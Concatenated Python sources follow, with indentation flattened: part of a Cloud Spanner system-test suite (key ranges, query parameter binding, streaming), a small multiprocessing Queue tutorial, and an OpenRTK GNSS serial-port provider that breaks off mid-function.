data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
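# generate_read_batches splits the keyset into read partitions; each
# partition is processed serially here and the union of the results is
# compared against the full expected table contents.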
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
def test_execute_sql_w_manual_consume(self):
row_count = 3000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=sql,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=sql, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=TypeCode.ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(TypeCode.STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(TypeCode.BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(TypeCode.INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(TypeCode.FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": param_types.FLOAT64},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": param_types.FLOAT64},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(TypeCode.BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(
TypeCode.TIMESTAMP, timestamp_1, timestamps, expected_timestamps
)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(TypeCode.DATE, SOME_DATE, dates)
@unittest.skipIf(USE_EMULATOR, "Skipping NUMERIC")
def test_execute_sql_w_numeric_bindings(self):
self._bind_test_helper(TypeCode.NUMERIC, NUMERIC_1, [NUMERIC_1, NUMERIC_2])
def test_execute_sql_w_query_param_struct(self):
name = "Phred"
count = 123
size = 23.456
height = 188.0
weight = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (name, count, size, (height, weight))},
param_types={"r": record_type},
expected=[(name, count, size, weight)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array = rows[0][0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
# Partitioned queries do not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
# Lists aren't hashable so the results need to be converted
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
if not database.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
multiprocessing3_queue.py
|
# View more 3_python 1_tensorflow_new tutorial on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
import multiprocessing as mp
def job(q):
res = 0
for i in range(1000):
res += i+i**2+i**3
q.put(res)  # push the result into the shared queue so the parent process can collect it
if __name__ == '__main__':
q = mp.Queue()
p1 = mp.Process(target=job, args=(q,))
p2 = mp.Process(target=job, args=(q,))
p1.start()
p2.start()
p1.join()
p2.join()
res1 = q.get()
res2 = q.get()
print(res1+res2)
|
uart_provider.py
|
import os
import time
import json
import datetime
import threading
import math
import re
import serial
import serial.tools.list_ports
from .ntrip_client import NTRIPClient
from ...framework.utils import (
helper, resource
)
from ...framework.context import APP_CONTEXT
from ..base.uart_base import OpenDeviceBase
from ..configs.openrtk_predefine import (
APP_STR, get_app_names
)
from ..decorator import with_device_message
from .firmware_parser import parser as firmware_content_parser
from ...models import InternalCombineAppParseRule
from ..upgrade_workers import (
FirmwareUpgradeWorker,
SDKUpgradeWorker
)
from ..upgrade_center import UpgradeCenter
from ..parsers.open_field_parser import encode_value
class Provider(OpenDeviceBase):
'''
OpenRTK UART provider
'''
def __init__(self, communicator, *args):
super(Provider, self).__init__(communicator)
self.type = 'RTK'
self.server_update_rate = 100
self.sky_data = []
self.pS_data = []
self.bootloader_baudrate = 115200
self.app_config_folder = ''
self.device_info = None
self.app_info = None
self.parameters = None
self.setting_folder_path = None
self.connection_file = None
self.data_folder = None
self.debug_serial_port = None
self.rtcm_serial_port = None
self.user_logf = None
self.debug_logf = None
self.rtcm_logf = None
self.debug_c_f = None
self.enable_data_log = False
self.is_app_matched = False
self.ntrip_client_enable = False
self.nmea_buffer = []
self.nmea_sync = 0
self.prepare_folders()
self.ntripClient = None
self.connected = True
def prepare_folders(self):
'''
Prepare folders for data storage and configuration
'''
executor_path = resource.get_executor_path()
setting_folder_name = 'setting'
config_file_name = 'openrtk.json'
data_folder_path = os.path.join(executor_path, 'data')
if not os.path.isdir(data_folder_path):
os.makedirs(data_folder_path)
self.data_folder = data_folder_path
self.connection_file = os.path.join(
executor_path, setting_folder_name, 'connection.json')
# copy contents of app_config under executor path
self.setting_folder_path = os.path.join(
executor_path, setting_folder_name, 'openrtk')
for app_name in get_app_names():
app_name_path = os.path.join(self.setting_folder_path, app_name)
app_name_config_path = os.path.join(
app_name_path, config_file_name)
if not os.path.isfile(app_name_config_path):
if not os.path.isdir(app_name_path):
os.makedirs(app_name_path)
app_config_content = resource.get_content_from_bundle(
setting_folder_name, os.path.join('openrtk', app_name, config_file_name))
if app_config_content is None:
continue
with open(app_name_config_path, "wb") as code:
code.write(app_config_content)
def ping(self):
'''
Check if the connected device is OpenRTK
'''
# print('start to check if it is openrtk')
device_info_text = self.internal_input_command('pG')
app_info_text = self.internal_input_command('gV')
APP_CONTEXT.get_logger().logger.debug('Checking if this is an OpenRTK device...')
APP_CONTEXT.get_logger().logger.debug(
'Device: {0}'.format(device_info_text))
APP_CONTEXT.get_logger().logger.debug(
'Firmware: {0}'.format(app_info_text))
if device_info_text.find('OpenRTK') > -1:
self._build_device_info(device_info_text)
self._build_app_info(app_info_text)
self.connected = True
print('# Connected Information #')
split_device_info = device_info_text.split(' ')
print('Device: {0} {1} {2} {3}'.format(split_device_info[0], split_device_info[2], split_device_info[3], split_device_info[4]))
print('APP version:', app_info_text)
APP_CONTEXT.get_logger().logger.info(
'Connected {0}, {1}'.format(device_info_text, app_info_text))
return True
return False
def build_device_info(self, device_info, app_info):
self._build_device_info(device_info)
self._build_app_info(app_info)
def _build_device_info(self, text):
'''
Build device info
'''
split_text = text.split(' ')
sn = split_text[4]
# remove the prefix of SN
if sn.find('SN:') == 0:
sn = sn[3:]
self.device_info = {
'name': split_text[0],
'imu': split_text[1],
'pn': split_text[2],
'firmware_version': split_text[3],
'sn': sn
}
def _build_app_info(self, text):
'''
Build app info
'''
app_version = text
split_text = app_version.split(' ')
app_name = next(
(item for item in APP_STR if item in split_text), None)
if not app_name:
app_name = 'INS'
self.is_app_matched = False
else:
self.is_app_matched = True
self.app_info = {
'app_name': app_name,
'version': text
}
def load_properties(self):
# Load config from user working path
local_config_file_path = os.path.join(os.getcwd(), 'openrtk.json')
if os.path.isfile(local_config_file_path):
with open(local_config_file_path) as json_data:
self.properties = json.load(json_data)
return
# Load the openimu.json based on its app
app_name = self.app_info['app_name']
app_file_path = os.path.join(
self.setting_folder_path, app_name, 'openrtk.json')
with open(app_file_path) as json_data:
self.properties = json.load(json_data)
def ntrip_client_thread(self):
self.ntripClient = NTRIPClient(self.properties, self.communicator)
self.ntripClient.run()
def build_connected_serial_port_info(self):
if not os.path.isfile(self.connection_file):
return None, None
with open(self.connection_file) as json_data:
connection = json.load(json_data)
user_port = connection['port']
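# Split the configured port (e.g. 'COM10' or '/dev/ttyUSB0') into its base
# name and trailing number so sibling UARTs can later be derived by
# offsetting that number.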
user_port_num = ''
port_name = ''
for i in range(len(user_port)-1, -1, -1):
if (user_port[i] >= '0' and user_port[i] <= '9'):
user_port_num = user_port[i] + user_port_num
else:
port_name = user_port[:i+1]
break
return user_port_num, port_name
def after_setup(self):
set_user_para = self.cli_options and self.cli_options.set_user_para
self.ntrip_client_enable = self.cli_options and self.cli_options.ntrip_client
# with_raw_log = self.cli_options and self.cli_options.with_raw_log
if set_user_para:
result = self.set_params(
self.properties["initial"]["userParameters"])
##print('set user para {0}'.format(result))
if (result['packetType'] == 'success'):
self.save_config()
if self.ntrip_client_enable:
t = threading.Thread(target=self.ntrip_client_thread)
t.start()
# if with_raw_log:
connection = None
debug_port = ''
rtcm_port = ''
try:
if (self.properties["initial"]["useDefaultUart"]):
user_port_num, port_name = self.build_connected_serial_port_info()
if not user_port_num or not port_name:
return False
#print('user_port {0} {1}'.format(user_port_num, port_name))
debug_port = port_name + str(int(user_port_num) + 2)
rtcm_port = port_name + str(int(user_port_num) + 1)
else:
for x in self.properties["initial"]["uart"]:
if x['enable'] == 1:
if x['name'] == 'DEBUG':
debug_port = x["value"]
elif x['name'] == 'GNSS':
rtcm_port = x["value"]
if self.data_folder is not None:
dir_time = time.strftime("%Y%m%d_%H%M%S", time.localtime())
file_time = time.strftime(
"%Y_%m_%d_%H_%M_%S", time.localtime())
file_name = self.data_folder + '/' + 'openrtk_log_' + dir_time
os.mkdir(file_name)
self.user_logf = open(
file_name + '/' + 'user_' + file_time + '.bin', "wb")
if rtcm_port != '':
print('OpenRTK log GNSS UART {0}'.format(rtcm_port))
self.rtcm_serial_port = serial.Serial(
rtcm_port, 460800, timeout=0.1)
if self.rtcm_serial_port.isOpen():
self.rtcm_logf = open(
file_name + '/' + 'rtcm_rover_' + file_time + '.bin', "wb")
t = threading.Thread(
target=self.thread_rtcm_port_receiver, args=(file_name,))
t.start()
if debug_port != '':
print('OpenRTK log DEBUG UART {0}'.format(debug_port))
self.debug_serial_port = serial.Serial(
debug_port, 460800, timeout=0.1)
if self.debug_serial_port.isOpen():
if self.app_info['app_name'] == 'RAWDATA':
self.debug_logf = open(
file_name + '/' + 'rtcm_base_' + file_time + '.bin', "wb")
elif self.app_info['app_name'] == 'RTK':
self.debug_logf = open(
file_name + '/' + 'rtcm_base_' + file_time + '.bin', "wb")
else:
self.debug_logf = open(
file_name + '/' + 'debug_' + file_time + '.bin', "wb")
t = threading.Thread(
target=self.thread_debug_port_receiver, args=(file_name,))
t.start()
except Exception as e:
if self.debug_serial_port is not None:
if self.debug_serial_port.isOpen():
self.debug_serial_port.close()
if self.rtcm_serial_port is not None:
if self.rtcm_serial_port.isOpen():
self.rtcm_serial_port.close()
self.debug_serial_port = None
self.rtcm_serial_port = None
print(e)
return False
def nmea_checksum(self, data):
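# The NMEA checksum is the XOR of every character between '$' and '*';
# return both the checksum transmitted in the sentence and the recomputed one.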
data = data.replace("\r", "").replace("\n", "").replace("$", "")
nmeadata, cksum = re.split(r'\*', data)
calc_cksum = 0
for s in nmeadata:
calc_cksum ^= ord(s)
return int(cksum, 16), calc_cksum
def on_read_raw(self, data):
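# Scan the raw byte stream for NMEA sentences: '$' starts a sentence and a
# CR/LF pair terminates it. Sentences whose checksum verifies are echoed to
# the console, GGA sentences are also forwarded to the NTRIP caster when it
# is enabled, and every raw byte is appended to the user log file.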
for bytedata in data:
if bytedata == 0x24:
self.nmea_buffer = []
self.nmea_sync = 0
self.nmea_buffer.append(chr(bytedata))
else:
self.nmea_buffer.append(chr(bytedata))
if self.nmea_sync == 0:
if bytedata == 0x0D:
self.nmea_sync = 1
elif self.nmea_sync == 1:
if bytedata == 0x0A:
try:
str_nmea = ''.join(self.nmea_buffer)
cksum, calc_cksum = self.nmea_checksum(
str_nmea)
if cksum == calc_cksum:
if str_nmea.find("$GPGGA") != -1:
print()
if self.ntrip_client_enable and self.ntripClient != None:
self.ntripClient.send(str_nmea)
print(str_nmea, end='')
# else:
# print("nmea checksum wrong {0} {1}".format(cksum, calc_cksum))
except Exception as e:
# print('NMEA fault:{0}'.format(e))
pass
self.nmea_buffer = []
self.nmea_sync = 0
if self.user_logf is not None:
self.user_logf.write(data)
def thread_debug_port_receiver(self, *args, **kwargs):
if self.debug_logf is None:
return
is_get_configuration = 0
file_name = args[0]
self.debug_c_f = open(file_name + '/' + 'configuration.txt', "w")
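# First poll the DEBUG UART for its JSON configuration dump and save it to
# configuration.txt, then switch the port into 'log debug' mode and stream
# the raw output into the debug log file.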
while True:
if is_get_configuration:
break
cmd_configuration = 'get configuration\r\n'
self.debug_serial_port.write(cmd_configuration.encode())
try_times = 20
for i in range(try_times):
data_buffer = self.debug_serial_port.read(500)
if len(data_buffer):
try:
#print('len = {0}'.format(len(data_buffer)))
str_data = bytes.decode(data_buffer)
# print('{0}'.format(str_data))
json_data = json.loads(str_data)
for key in json_data.keys():
if key == 'openrtk configuration':
print('{0}'.format(json_data))
if self.debug_c_f:
self.debug_c_f.write(str_data)
self.debug_c_f.close()
is_get_configuration = 1
if is_get_configuration:
break
except Exception as e:
#print('DEBUG PORT Thread:json error:', e)
# the json will not be completed
pass
cmd_log = 'log debug on\r\n'
self.debug_serial_port.write(cmd_log.encode())
# log data
while True:
try:
data = bytearray(self.debug_serial_port.read_all())
except Exception as e:
print('DEBUG PORT Thread:receiver error:', e)
return # exit thread receiver
if len(data):
self.debug_logf.write(data)
else:
time.sleep(0.001)
def thread_rtcm_port_receiver(self, *args, **kwargs):
if self.rtcm_logf is None:
return
while True:
try:
data = bytearray(self.rtcm_serial_port.read_all())
except Exception as e:
print('RTCM PORT Thread:receiver error:', e)
return # exit thread receiver
if len(data):
self.rtcm_logf.write(data)
else:
time.sleep(0.001)
def on_receive_output_packet(self, packet_type, data, error=None):
'''
Listener for getting output packet
'''
# $GPGGA,080319.00,3130.4858508,N,12024.0998832,E,4,25,0.5,12.459,M,0.000,M,2.0,*46
if packet_type == 'gN':
if self.ntrip_client_enable:
# $GPGGA
gpgga = '$GPGGA'
# time
timeOfWeek = float(data['GPS_TimeofWeek'])
dsec = int(timeOfWeek)
msec = timeOfWeek - dsec
sec = dsec % 86400
hour = int(sec / 3600)
minute = int(sec % 3600 / 60)
second = sec % 60
gga_time = format(hour*10000 + minute*100 +
second + msec - 18, '09.2f')
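# NOTE: the fixed 18-second subtraction appears to be the current
# GPS-to-UTC leap-second offset applied when formatting the GGA time.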
